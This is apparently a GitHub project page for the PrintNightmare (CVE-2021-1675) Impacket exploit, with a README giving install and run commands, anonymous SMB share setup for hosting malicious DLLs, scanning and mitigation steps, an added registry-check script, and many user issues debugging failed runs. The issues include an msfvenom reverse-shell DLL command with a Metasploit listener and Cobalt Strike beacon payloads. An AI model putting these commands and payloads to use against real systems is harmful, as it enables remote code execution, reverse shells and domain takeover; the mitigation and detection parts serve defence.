
cve-2021-1675's Introduction

CVE-2021-1675 / CVE-2021-34527

Impacket implementation of the PrintNightmare PoC originally created by Zhiniang Peng (@edwardzpeng) & Xuefeng Li (@lxf02942370)

Tested on a fully patched 2019 Domain Controller

Execute malicious DLLs remotely or locally

Patch update

Microsoft has released a patch to mitigate these attacks, but if the values below are present on a machine, that machine will still be vulnerable:

REG QUERY "HKLM\Software\Policies\Microsoft\Windows NT\Printers\PointAndPrint"

HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\Printers\PointAndPrint
    RestrictDriverInstallationToAdministrators    REG_DWORD    0x0
    NoWarningNoElevationOnInstall    REG_DWORD    0x1

Installation

Before running the exploit you need to install my version of Impacket; after that you're gucci.

pip3 uninstall impacket
git clone https://github.com/cube0x0/impacket
cd impacket
python3 ./setup.py install

CVE-2021-1675.py

usage: CVE-2021-1675.py [-h] [-hashes LMHASH:NTHASH] [-target-ip ip address] [-port [destination port]] target share

CVE-2021-1675 implementation.

positional arguments:
  target                [[domain/]username[:password]@]<targetName or address>
  share                 Path to DLL. Example '\\10.10.10.10\share\evil.dll'

optional arguments:
  -h, --help            show this help message and exit

authentication:
  -hashes LMHASH:NTHASH
                        NTLM hashes, format is LMHASH:NTHASH

connection:
  -target-ip ip address
                        IP Address of the target machine. If omitted it will use whatever was specified as target. This is useful when target is the NetBIOS name
                        and you cannot resolve it
  -port [destination port]
                        Destination port to connect to SMB Server

Example:
./CVE-2021-1675.py hackit.local/domain_user:[email protected] '\\192.168.1.215\smb\addCube.dll'
./CVE-2021-1675.py hackit.local/domain_user:[email protected] 'C:\addCube.dll'

SMB configuration

The easiest way to host payloads is to use Samba and modify /etc/samba/smb.conf to allow anonymous access:

[global]
    map to guest = Bad User
    server role = standalone server
    usershare allow guests = yes
    idmap config * : backend = tdb
    smb ports = 445

[smb]
    comment = Samba
    path = /tmp/
    guest ok = yes
    read only = no
    browsable = yes
    force user = smbuser

From Windows it's also possible:

mkdir C:\share
icacls C:\share\ /T /grant Anonymous` logon:r
icacls C:\share\ /T /grant Everyone:r
New-SmbShare -Path C:\share -Name share -ReadAccess 'ANONYMOUS LOGON','Everyone'
REG ADD "HKLM\System\CurrentControlSet\Services\LanManServer\Parameters" /v NullSessionPipes /t REG_MULTI_SZ /d srvsvc /f #This will overwrite existing NullSessionPipes
REG ADD "HKLM\System\CurrentControlSet\Services\LanManServer\Parameters" /v NullSessionShares /t REG_MULTI_SZ /d share /f
REG ADD "HKLM\System\CurrentControlSet\Control\Lsa" /v EveryoneIncludesAnonymous /t REG_DWORD /d 1 /f
REG ADD "HKLM\System\CurrentControlSet\Control\Lsa" /v RestrictAnonymous /t REG_DWORD /d 0 /f
# Reboot

Scanning

We can use rpcdump.py from Impacket to scan for potentially vulnerable hosts; if it returns a value, the host could be vulnerable:

rpcdump.py @192.168.1.10 | egrep 'MS-RPRN|MS-PAR'

Protocol: [MS-PAR]: Print System Asynchronous Remote Protocol 
Protocol: [MS-RPRN]: Print System Remote Protocol

Mitigation

Disable the Spooler service:

Stop-Service Spooler
REG ADD  "HKLM\SYSTEM\CurrentControlSet\Services\Spooler"  /v "Start" /t REG_DWORD /d "4" /f
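As an added example (not code from the cube0x0 repository), this Python script applies the "Patch update" condition above and the Spooler "Start" value from the Mitigation section to captured REG QUERY output, so a defender can triage hosts from collected registry dumps; the sample outputs are constructed, and the meaning of Start = 2 (automatic) and 4 (disabled) is a Windows service-control fact assumed here rather than stated on the page.

```python
"""Assess PrintNightmare exposure from captured REG QUERY output.

Added example; not code from the cube0x0 repository. It encodes the README's
condition for a patched-but-still-vulnerable host (RestrictDriverInstallationToAdministrators
= 0 together with NoWarningNoElevationOnInstall = 1 under the PointAndPrint key) and
reads the Spooler service's Start value, which the Mitigation section sets to 4.
"""
import re
from typing import Dict, Optional

# REG QUERY prints each value as "<name>    <type>    <data>", DWORDs in hex.
_VALUE_RE = re.compile(r"^\s*(\S+)\s+(REG_DWORD|REG_SZ|REG_MULTI_SZ|REG_EXPAND_SZ)\s+(.*?)\s*$")

# Service Start values (SCM constants, assumed, not from the page): 2 = automatic, 4 = disabled.
SERVICE_DISABLED = 4


def parse_reg_query(output: str) -> Dict[str, str]:
    """Map value name -> raw data for every value line in REG QUERY output.

    Key-path lines and REG QUERY's "ERROR: ... unable to find" message do not
    match the value pattern, so a missing key simply yields an empty mapping.
    """
    values: Dict[str, str] = {}
    for line in output.splitlines():
        m = _VALUE_RE.match(line)
        if m:
            values[m.group(1)] = m.group(3)
    return values


def dword(values: Dict[str, str], name: str) -> Optional[int]:
    """Return a REG_DWORD as int (REG QUERY shows it as 0x...), or None if absent."""
    raw = values.get(name)
    return int(raw, 16) if raw is not None else None


def assess(point_and_print_output: str, spooler_output: str) -> Dict[str, object]:
    """Combine the README's registry condition with the Spooler Start value.

    point_and_print_output: text of
        REG QUERY "HKLM\\Software\\Policies\\Microsoft\\Windows NT\\Printers\\PointAndPrint"
    spooler_output: text of
        REG QUERY "HKLM\\SYSTEM\\CurrentControlSet\\Services\\Spooler" /v Start
    """
    pnp = parse_reg_query(point_and_print_output)
    restrict = dword(pnp, "RestrictDriverInstallationToAdministrators")
    no_warning = dword(pnp, "NoWarningNoElevationOnInstall")
    start = dword(parse_reg_query(spooler_output), "Start")

    # The README's condition: both values present with exactly these settings.
    exposed = restrict == 0 and no_warning == 1
    spooler_disabled = start == SERVICE_DISABLED

    if spooler_disabled:
        verdict = "MITIGATED"      # no spooler, nothing reachable over MS-RPRN/MS-PAR
    elif exposed:
        verdict = "VULNERABLE"     # patch installed but Point and Print weakened
    else:
        verdict = "NOT_EXPOSED_BY_THIS_CHECK"

    return {
        "restrict_driver_installation_to_administrators": restrict,
        "no_warning_no_elevation_on_install": no_warning,
        "spooler_start": start,
        "point_and_print_exposed": exposed,
        "spooler_disabled": spooler_disabled,
        "verdict": verdict,
    }


# Constructed sample outputs (the first mirrors the README's weak configuration).
SAMPLE_PNP_WEAK = """
HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\Windows NT\\Printers\\PointAndPrint
    RestrictDriverInstallationToAdministrators    REG_DWORD    0x0
    NoWarningNoElevationOnInstall    REG_DWORD    0x1
"""
SAMPLE_PNP_HARDENED = """
HKEY_LOCAL_MACHINE\\Software\\Policies\\Microsoft\\Windows NT\\Printers\\PointAndPrint
    RestrictDriverInstallationToAdministrators    REG_DWORD    0x1
    NoWarningNoElevationOnInstall    REG_DWORD    0x0
"""
SAMPLE_PNP_MISSING = "ERROR: The system was unable to find the specified registry key or value."
SAMPLE_SPOOLER_AUTO = """
HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\Spooler
    Start    REG_DWORD    0x2
"""
SAMPLE_SPOOLER_DISABLED = SAMPLE_SPOOLER_AUTO.replace("0x2", "0x4")

if __name__ == "__main__":
    for label, pnp, spool in [
        ("weak / spooler running", SAMPLE_PNP_WEAK, SAMPLE_SPOOLER_AUTO),
        ("hardened / spooler running", SAMPLE_PNP_HARDENED, SAMPLE_SPOOLER_AUTO),
        ("weak / spooler disabled", SAMPLE_PNP_WEAK, SAMPLE_SPOOLER_DISABLED),
        ("key missing / spooler running", SAMPLE_PNP_MISSING, SAMPLE_SPOOLER_AUTO),
    ]:
        print(f"{label}: {assess(pnp, spool)['verdict']}")
```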

cve-2021-1675's People

Contributors

cube0x0


cve-2021-1675's Issues

Trouble running exploit

What problem did I have, as described below, when I ran the exploit?

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "/tmp/CVE-2021-1675.py", line 176, in <module>
    main(dce, pDriverPath, options.share)
  File "/tmp/CVE-2021-1675.py", line 84, in main
    resp = rprn.hRpcAddPrinterDriverEx(dce, pName=handle, pDriverContainer=container_info, dwFileCopyFlags=flags)
  File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/dcerpc/v5/rprn.py", line 633, in hRpcAddPrinterDriverEx
    return dce.request(request)
  File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/dcerpc/v5/rpcrt.py", line 857, in request
    answer = self.recv()
  File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/dcerpc/v5/rpcrt.py", line 1308, in recv
    response_data = self._transport.recv(forceRecv, count=MSRPCRespHeader._SIZE)
  File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/dcerpc/v5/transport.py", line 547, in recv
    return self.__smb_connection.readFile(self.__tid, self.__handle)
  File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/smbconnection.py", line 597, in readFile
    bytesRead = self._SMBConnection.read_andx(treeId, fileId, offset, toRead)
  File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/smb3.py", line 1975, in read_andx
    return self.read(tid, fid, offset, max_size, wait_answer)
  File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/smb3.py", line 1310, in read
    ans = self.recvSMB(packetID)
  File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/smb3.py", line 454, in recvSMB
    data = self._NetBIOSSession.recv_packet(self._timeout)
  File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/nmb.py", line 914, in recv_packet
    data = self.__read(timeout)
  File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/nmb.py", line 1001, in __read
    data = self.read_function(4, timeout)
  File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/nmb.py", line 985, in non_polling_read
    raise NetBIOSTimeout
impacket.nmb.NetBIOSTimeout: The NETBIOS connection with the remote host timed out.
Hope to get help from seniors. Thank you. <3 <3 <3

RPRN SessionError: code: 0x3 - ERROR_PATH_NOT_FOUND

Receiving this error when executing the script. The DLL is getting uploaded and is in the driver list; it exists at the file path "C:\Windows\System32\spool\drivers\x64\3\MyDll.dll".
Output:
[*] Connecting to ncacn_np:10.1.1.6[\PIPE\spoolss]
[+] Bind OK
[+] pDriverPath Found C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_83aa9aebf5dffc96\Amd64\UNIDRV.DLL
[*] Executing \10.1.1.5\smb\MyDll.dll
[*] Stage0: 0
RPRN SessionError: code: 0x3 - ERROR_PATH_NOT_FOUND - The system cannot find the path specified.

Server is Windows server 2019 Essentials

DLL Uploaded but Not Executed (Windows 10)

Running remotely against a Windows 10 host.

Running the exploit successfully drops the malicious DLL in C:\Windows\System32\spool\drivers\x64\3. However, the "backup" process in the exploit write-up does not appear to be happening. C:\Windows\System32\spool\drivers\x64\3\old never appears to exist, resulting in RPRN SessionError: code: 0x3 - ERROR_PATH_NOT_FOUND - The system cannot find the path specified. errors when trying to execute the dll.

I have tried changing the pConfigFile to point at the .dll that I know exists:
container_info['DriverInfo']['Level2']['pConfigFile'] = "C:\\Windows\\System32\\spool\\drivers\\x64\\3\\{0}\x00".format(filename)

But this results in what I believe is expected from the original writeup:
RPRN SessionError: code: 0x20 - ERROR_SHARING_VIOLATION - The process cannot access the file because it is being used by another process.

C# Version can't run

The C# exp error:

Unhandled Exception: System.IO.FileNotFoundException: Could not load file or assembly 'System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089' or one of its dependencies. The system cannot find the path specified.
   at SharpPrintNightmare.Program.getDrivers(String computername)
   at SharpPrintNightmare.Program.Main(String[] args)

Target Framework is set to 4.0

SMB SessionError: STATUS_OBJECT_NAME_NOT_FOUND

Connection Failed. I printed the error:

$ python3 CVE-2021-1675.py test.com/administrator:[email protected] '\\10.211.55.15\share\re.dll'
[*] Try 1...
username:administrator password:MacBookPro111 domain:test.com lmhash: nthash: address:10.211.55.28 port:445
[*] Connecting to ncacn_np:10.211.55.28[\PIPE\spoolss]
[-] Connection Failed
SMB SessionError: STATUS_OBJECT_NAME_NOT_FOUND(The object name is not found.)

impacket.dcerpc.v5.rprn.DCERPCSessionError: RPRN SessionError: code: 0x525 - ERROR_NO_SUCH_USER - The specified account does not exist.

Hello.

I always receive this message: impacket.dcerpc.v5.rprn.DCERPCSessionError: RPRN SessionError: code: 0x525 - ERROR_NO_SUCH_USER - The specified account does not exist.

Has anyone had the same problem or know how I can solve it please?

Complete stdout:

"root@debianbraier:~/impacket/CVE-2021-1675# ./CVE-2021-1675.py dcbraier.teste/balves:[email protected] '\172.16.224.6\smb\fakeprinter.dll'
[*] Connecting to ncacn_np:172.16.224.10[\PIPE\spoolss]
[+] Bind OK
[+] pDriverPath Found C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_83aa9aebf5dffc96\Amd64\UNIDRV.DLL
[*] Executing \172.16.224.6\smb\fakeprinter.dll
[*] Try 1...
Traceback (most recent call last):
  File "./CVE-2021-1675.py", line 176, in <module>
    main(dce, pDriverPath, options.share)
  File "./CVE-2021-1675.py", line 84, in main
    resp = rprn.hRpcAddPrinterDriverEx(dce, pName=handle, pDriverContainer=container_info, dwFileCopyFlags=flags)
  File "/usr/local/lib/python3.7/dist-packages/impacket-0.9.24.dev1+20210630.100536.73b9466c-py3.7.egg/impacket/dcerpc/v5/rprn.py", line 633, in hRpcAddPrinterDriverEx
    return dce.request(request)
  File "/usr/local/lib/python3.7/dist-packages/impacket-0.9.24.dev1+20210630.100536.73b9466c-py3.7.egg/impacket/dcerpc/v5/rpcrt.py", line 878, in request
    raise exception
impacket.dcerpc.v5.rprn.DCERPCSessionError: RPRN SessionError: code: 0x525 - ERROR_NO_SUCH_USER - The specified account does not exist."

User exists in the AD: "balves"

Target: WS 2019

Thanks

Connection Failed

└─# python3 CVE-2021-1675.py domain.com/sird:[email protected] \192.168.189.131\smb\shell.dll
[*] Connecting to ncacn_np:192.168.189.128[\PIPE\spoolss]
[-] Connection Failed

Anyone know how to fix this issue? I was not able to connect to my Windows Server 2019.

[-] Failed to enumerate printer drivers

Hi,
I ran this:
SharpPrintNightmare.exe '\DESKTOP-BVJA\Users\F1\Desktop\share\rev.dll' '\192.168.100.135' pr.local user 123@qwe
and the result is:
[-] Failed to enumerate printer drivers

Error in RPC

Traceback (most recent call last):
  File "/home/kali/github/CVE-2021-1675/CVE-2021-1675.py", line 117, in <module>
    main(username, password, domain, lmhash, nthash, options.target_ip, options.port, options.share)
  File "/home/kali/github/CVE-2021-1675/CVE-2021-1675.py", line 53, in main
    resp = rprn.hRpcAddPrinterDriverEx(dce, pName=handle, pDriverContainer=container_info, dwFileCopyFlags=flags)
  File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210629.125315.f43cf082-py3.9.egg/impacket/dcerpc/v5/rprn.py", line 614, in hRpcAddPrinterDriverEx
    return dce.request(request)
  File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210629.125315.f43cf082-py3.9.egg/impacket/dcerpc/v5/rpcrt.py", line 878, in request
    raise exception
impacket.dcerpc.v5.rpcrt.DCERPCException: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied

How to create an anonymous SMB server without domain admin authority

I want to create an anonymous SMB server on a Windows machine that is in a domain, but it needs domain administrator authentication.

If I create an anonymous SMB server outside the domain, I can't access the SMB directory from my domain controller.

So how do I create an SMB service that allows anonymous access without requiring domain administrator authentication?

ERROR_PATH_NOT_FOUND

Hitting this error,

Target Server 2016 Datacenter

root@kali:~/Desktop/CVE-2021-1675# python3 CVE-2021-1675.py 'testdomain.local/username:P@[email protected]' '\\172.31.30.112\smb\printer22.dll'
[*] Try 1...
[*] Connecting to ncacn_np:172.31.35.104[\PIPE\spoolss]
[+] Bind OK
[*] Uploading \\172.31.30.112\smb\printer22.dll
Traceback (most recent call last):
  File "CVE-2021-1675.py", line 119, in <module>
    main(username, password, domain, lmhash, nthash, options.target_ip, options.port, options.share)
  File "CVE-2021-1675.py", line 55, in main
    resp = rprn.hRpcAddPrinterDriverEx(dce, pName=handle, pDriverContainer=container_info, dwFileCopyFlags=flags)
  File "/usr/local/lib/python3.8/dist-packages/impacket/dcerpc/v5/rprn.py", line 614, in hRpcAddPrinterDriverEx
    return dce.request(request)
  File "/usr/local/lib/python3.8/dist-packages/impacket/dcerpc/v5/rpcrt.py", line 878, in request
    raise exception
impacket.dcerpc.v5.rprn.DCERPCSessionError: RPRN SessionError: code: 0x3 - ERROR_PATH_NOT_FOUND - The system cannot find the path specified.

RPRN SessionError: code: 0x20 - ERROR_SHARING_VIOLATION - The process cannot access the file because it is being used by another process

sudo python3 CVE-2021-1675.py TEST/administrator:[email protected] '\192.168.121.128\smb\reverse.dll' 'C:\Windows\System32\spool\drivers\x64\3\UNIDRV.DLL'
[*] Connecting to ncacn_np:192.168.121.164[\PIPE\spoolss]
[+] Bind OK
[+] pDriverPath Found C:\Windows\System32\spool\drivers\x64\3\UNIDRV.DLL
[*] Executing \192.168.121.128\smb\reverse.dll
[*] Try 1...
Traceback (most recent call last):
  File "/home/kali/CVE-2021-1675.py", line 176, in <module>
    main(dce, pDriverPath, options.share)
  File "/home/kali/CVE-2021-1675.py", line 84, in main
    resp = rprn.hRpcAddPrinterDriverEx(dce, pName=handle, pDriverContainer=container_info, dwFileCopyFlags=flags)
  File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/dcerpc/v5/rprn.py", line 633, in hRpcAddPrinterDriverEx
    return dce.request(request)
  File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/dcerpc/v5/rpcrt.py", line 878, in request
    raise exception
impacket.dcerpc.v5.rprn.DCERPCSessionError: RPRN SessionError: code: 0x20 - ERROR_SHARING_VIOLATION - The process cannot access the file because it is being used by another process.

Exploit failed

C:\Users\test\Desktop>SharpPrintNightmare.exe '\\100.100.100.102\share\mimilib.dll' 'C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_7b3eed059f4c3e41\Amd64\UNIDRV.DLL' '\\100.100.100.100'
[*] Try 1...
[*] pDriverPath 'C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_7b3eed059f4c3e41\Amd64\UNIDRV.DLL'
[*] Executing '\\100.100.100.102\share\mimilib.dll'
[*] Stage 0: 1801
[*] Try 2...
[*] pDriverPath 'C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_7b3eed059f4c3e41\Amd64\UNIDRV.DLL'
[*] Executing '\\100.100.100.102\share\mimilib.dll'
[*] Stage 0: 1801
[*] Try 3...
[*] pDriverPath 'C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_7b3eed059f4c3e41\Amd64\UNIDRV.DLL'
[*] Executing '\\100.100.100.102\share\mimilib.dll'
[*] Stage 0: 1801

Doesn't seem to work; Wireshark also did not catch the traffic.

member server and workstation

It seems to be working on member servers and workstations only when UAC is off (RPC access denied on rpcaddprinterdriverex).
Works as-is on a DC.

Any info about that?

Maybe something with rprn.APD_COPY_ALL_FILES | 0x10 | 0x8000?

ERROR_NO_SUCH_USER

The exploit fails, after a successful connection, bind, and dll upload with error ERROR_NO_SUCH_USER:

(screenshot: Screen Shot 2021-06-30 at 12 50 58)

Access Denied on unpatched systems

Hi,

I am trying to use the RCE version of the exploit on an unpatched test environment with no success. The LPE attack works.

Domain Controller:
(screenshot)

Victim domain member:
(screenshot)

This is the result:

python3 CVE-2021-1675.py 'LAB/attacker:Password@victim_IP' '\\file_server_IP\nightmare\nightmare.dll'
[*] Connecting to ncacn_np:192.168.0.200[\PIPE\spoolss]
[+] Bind OK
[+] pDriverPath Found C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_18b0d38ddfaee729\Amd64\UNIDRV.DLL
[*] Executing \??\UNC\192.168.0.102\nightmare\nightmare.dll
[*] Try 1...
Traceback (most recent call last):
  File "CVE-2021-1675.py", line 188, in <module>
    main(dce, pDriverPath, options.share)
  File "CVE-2021-1675.py", line 93, in main
    resp = rprn.hRpcAddPrinterDriverEx(dce, pName=handle, pDriverContainer=container_info, dwFileCopyFlags=flags)
  File "/usr/local/lib/python3.6/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.6.egg/impacket/dcerpc/v5/rprn.py", line 633, in hRpcAddPrinterDriverEx
    return dce.request(request)
  File "/usr/local/lib/python3.6/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.6.egg/impacket/dcerpc/v5/rpcrt.py", line 878, in request
    raise exception
impacket.dcerpc.v5.rpcrt.DCERPCException: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied

Any help is appreciated.

Remote Exploit Questions

For the remote exploits, do you still need the same SMB configuration as you would with the Python script (either samba or the silly Windows share config)?

I have my share configured as mentioned in the python script readme, and I have tried running the remote as current context and remote runas against the DC using the path mentioned in the help menu and was getting Windows error code 1801. I also tried it against a generic share (not configured for null session, but Anonymous and Everyone have Read Access) and got the same 1801 error.

I switched the file to the one on the DC which has a slightly different path (amd64_7b3eed059f4c3e41) and was still getting windows error code 1801 on all attempts.

Cut from CobaltStrike

(same results in remote and runas)

Using the file path in the help menu

[*] Try 1...
[*] pDriverPath 'C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_83aa9aebf5dffc96\Amd64\UNIDRV.DLL'
[*] Executing '\172.16.190.156\share7\beacon2.dll'
[*] Stage 0: 1801
[*] Try 2...
[*] pDriverPath 'C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_83aa9aebf5dffc96\Amd64\UNIDRV.DLL'
[*] Executing '\172.16.190.156\share7\beacon2.dll'
[*] Stage 0: 1801
[*] Try 3...
[*] pDriverPath 'C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_83aa9aebf5dffc96\Amd64\UNIDRV.DLL'
[*] Executing '\172.16.190.156\share7\beacon2.dll'
[*] Stage 0: 1801

Using the file path from my DC

[*] Try 1...
[*] pDriverPath
'C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_7b3eed059f4c3e41\Amd64\UNIDRV.DLL'
[*] Executing '\172.16.190.156\share7\beacon2.dll'
[*] Stage 0: 1801
[*] Try 2...
[*] pDriverPath 'C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_7b3eed059f4c3e41\Amd64\UNIDRV.DLL'
[*] Executing '\172.16.190.156\share7\beacon2.dll'
[*] Stage 0: 1801

RPRN SessionError: code: 0x3 - ERROR_PATH_NOT_FOUND - The system cannot find the path specified.

sudo python3 CVE-2021-1675.py test.local/chen:[email protected] '\192.168.121.128\smb\reverse.dll'
[*] Connecting to ncacn_np:192.168.121.165[\PIPE\spoolss]
[+] Bind OK
[+] pDriverPath Found C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_7b3eed059f4c3e41\Amd64\UNIDRV.DLL
[*] Executing ??\UNC\192.168.121.128\smb\reverse.dll
[*] Try 1...
Traceback (most recent call last):
  File "/home/kali/CVE-2021-1675.py", line 188, in <module>
    main(dce, pDriverPath, options.share)
  File "/home/kali/CVE-2021-1675.py", line 93, in main
    resp = rprn.hRpcAddPrinterDriverEx(dce, pName=handle, pDriverContainer=container_info, dwFileCopyFlags=flags)
  File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/dcerpc/v5/rprn.py", line 633, in hRpcAddPrinterDriverEx
    return dce.request(request)
  File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210704.162046.29ad5792-py3.9.egg/impacket/dcerpc/v5/rpcrt.py", line 878, in request
    raise exception
impacket.dcerpc.v5.rprn.DCERPCSessionError: RPRN SessionError: code: 0x2 - ERROR_FILE_NOT_FOUND - The system cannot find the file specified.

Exploit runs but no execution/ Stuck on stage 0

$ python .\CVE-2021-1675.py ignite.local/techuser:[email protected] "\10.10.10.155\share\meter.dll"
[*] Try 1...
[*] Connecting to ncacn_np:10.10.10.156[\PIPE\spoolss]
[+] Bind OK
[+] pDriverPath Found C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_7b3eed059f4c3e41\Amd64\UNIDRV.DLL
[*] Executing \10.10.10.155\share\meter.dll
[*] Stage0: 0
[*] Try 2...
[*] Connecting to ncacn_np:10.10.10.156[\PIPE\spoolss]
[+] Bind OK
[+] pDriverPath Found C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_7b3eed059f4c3e41\Amd64\UNIDRV.DLL
[*] Executing \10.10.10.155\share\meter.dll
[*] Stage0: 0
[*] Try 3...
[*] Connecting to ncacn_np:10.10.10.156[\PIPE\spoolss]
[+] Bind OK
[+] pDriverPath Found C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_7b3eed059f4c3e41\Amd64\UNIDRV.DLL
[*] Executing \10.10.10.155\share\meter.dll
[*] Stage0: 0

DLL doesn't get executed.

ERROR_INVALID_PARAMETER

Hi,

I started SMB sharing as anonymous with SMBv2 support. Any user can access the SMB share and it works correctly with the DLL, but I keep getting the following error. Do you have any advice?

[*] Try 1...
[*] Connecting to ncacn_np:192.168.237.131[\PIPE\spoolss]
[+] Bind OK
[*] Uploading \\192.168.237.130\share\a.dll
Traceback (most recent call last):
  File "/opt/CVE-2021-1675/CVE-2021-1675.py", line 117, in <module>
    main(username, password, domain, lmhash, nthash, options.target_ip, options.port, options.share)
  File "/opt/CVE-2021-1675/CVE-2021-1675.py", line 53, in main
    resp = rprn.hRpcAddPrinterDriverEx(dce, pName=handle, pDriverContainer=container_info, dwFileCopyFlags=flags)
  File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210629.125315.f43cf082-py3.9.egg/impacket/dcerpc/v5/rprn.py", line 614, in hRpcAddPrinterDriverEx
    return dce.request(request)
  File "/usr/local/lib/python3.9/dist-packages/impacket-0.9.24.dev1+20210629.125315.f43cf082-py3.9.egg/impacket/dcerpc/v5/rpcrt.py", line 878, in request
    raise exception
impacket.dcerpc.v5.rprn.DCERPCSessionError: RPRN SessionError: code: 0x57 - ERROR_INVALID_PARAMETER - The parameter is incorrect.

module 'impacket.dcerpc.v5.rprn' has no attribute 'hRpcEnumPrinterDrivers'

Hi,

setup: Kali Linux (192.168.0.10)


msfvenom -a x64 -p windows/x64/shell_reverse_tcp LHOST=192.168.0.10 LPORT=4444 -f dll -o /tmp/rev.dll

/etc/samba/smb.conf:
[global]
    map to guest = Bad User
    server role = standalone server
    usershare allow guests = yes
    idmap config * : backend = tdb
    smb ports = 445

[public]
    comment = Samba
    path = /tmp
    guest ok = yes
    read only = no
    browsable = yes
    force user = root

Share works; I can open it from the Win10 system with \192.168.0.1\public
and can see the rev.dll.


# smbstatus

Samba version 4.13.5-Debian
PID     Username     Group        Machine                                   Protocol Version  Encryption           Signing              
----------------------------------------------------------------------------------------------------------------------------------------
2839    nobody       nogroup      192.168.0.12 (ipv4:192.168.0.12:49924)    SMB3_11           -                    -                    

share

msfconsole
use exploit/multi/handler
set payload windows/x64/shell_reverse_tcp
set lhost 192.168.0.10
set lport 4444
run

# python3 CVE-2021-1675.py ./anna:[email protected] '\\192.168.0.10\\public\\rev.dll'
[*] Connecting to ncacn_np:192.168.0.12[\PIPE\spoolss]
[+] Bind OK
[-] Failed to enumerate remote pDriverPath
module 'impacket.dcerpc.v5.rprn' has no attribute 'hRpcEnumPrinterDrivers'



victim: Windows 10 21H1 (64bit) build 19043 (192.168.0.12) firewall is disabled

When trying to copy the DLL to the Desktop, for example:

(screenshot: copy_error)

But if I disable the virus check, I get the same error with the Python script:

(screenshot: virus)

How to fix it?

ERROR_BAD_EXE_FORMAT - %1 is not a valid Win32 Application

Getting this error when running exploit:

impacket.dcerpc.v5.rprn.DCERPCSessionError: RPRN SessionError: code: 0xc1 - ERROR_BAD_EXE_FORMAT - %1 is not a valid Win32 application.

I've tried both 32bit and 64bit DLLs via MSFVenom but get the same error for each.

Connection Failed

Hi, I tried to run the Python script via Windows cmd and Linux Ubuntu 20 WSL; both result in the same error.

C:\Users\kolet\Downloads>python3 CVE-2021-1675.py hihi:[email protected] \\192.168.5.101\sft\re.dll
[*] Connecting to ncacn_np:192.168.5.52[\PIPE\spoolss]
[-] Connection Failed

I shared the re.dll with Samba on Linux; since it was in WSL I thought it did not work, so I just shared a folder with the re.dll inside, gave everyone permission to read/write into the folder and disabled the password requirement in the advanced sharing settings.

I made sure 192.168.5.52 could reach \192.168.5.101\sft\ manually (and it could).

What am I doing wrong?

Thanks!

impacket.dcerpc.v5.rprn.DCERPCSessionError: RPRN SessionError: unknown error code: 0x180

Connecting to ncacn_np:*****[\PIPE\spoolss]
[+] Bind OK
[+] pDriverPath Found C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_18b0d38ddfaee729\Amd64\UNIDRV.DLL
[*] Executing ??\UNC***\share\reverse.dll
[*] Try 1...
Traceback (most recent call last):
  File "/home/kali/share/CVE-2021-1675-main/./CVE-2021-1675.py", line 188, in <module>
    main(dce, pDriverPath, options.share)
  File "/home/kali/share/CVE-2021-1675-main/./CVE-2021-1675.py", line 93, in main
    resp = rprn.hRpcAddPrinterDriverEx(dce, pName=handle, pDriverContainer=container_info, dwFileCopyFlags=flags)
